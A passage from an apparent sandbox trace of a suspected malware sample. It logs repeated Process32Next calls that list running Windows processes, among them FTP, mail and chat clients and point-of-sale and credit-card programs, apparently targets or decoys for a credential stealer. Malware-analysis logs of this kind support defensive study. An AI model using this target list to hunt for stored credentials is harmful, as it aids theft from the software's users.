lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.124] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0146.126] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0146.129] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0146.222] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.224] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.225] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0146.227] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.229] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.230] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.232] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.233] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.235] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.236] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.238] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0146.239] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0146.241] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0146.243] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0146.244] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.246] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0146.247] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0146.249] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0146.250] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0146.253] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0146.254] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0146.272] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.274] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0146.276] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0146.277] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0146.279] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0146.280] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.282] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0146.284] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0146.286] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0146.288] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0146.290] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0146.292] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0146.294] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0146.326] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0146.327] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0146.370] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0146.372] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0146.374] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0146.376] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0146.391] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0146.393] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0146.396] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0146.398] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0146.400] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0146.402] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0146.404] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0146.406] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0146.408] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0146.411] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0146.414] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0146.417] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0146.420] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0146.422] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0146.428] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0146.431] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0146.435] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0146.438] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0146.440] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0146.447] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0146.450] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0146.453] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0146.455] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0146.458] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0146.461] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0146.463] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0146.466] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0146.469] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0146.476] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0146.478] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0146.481] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0146.484] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0146.486] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0146.489] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0146.493] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0146.496] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0146.498] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0146.500] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0146.503] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0146.506] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0146.520] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, 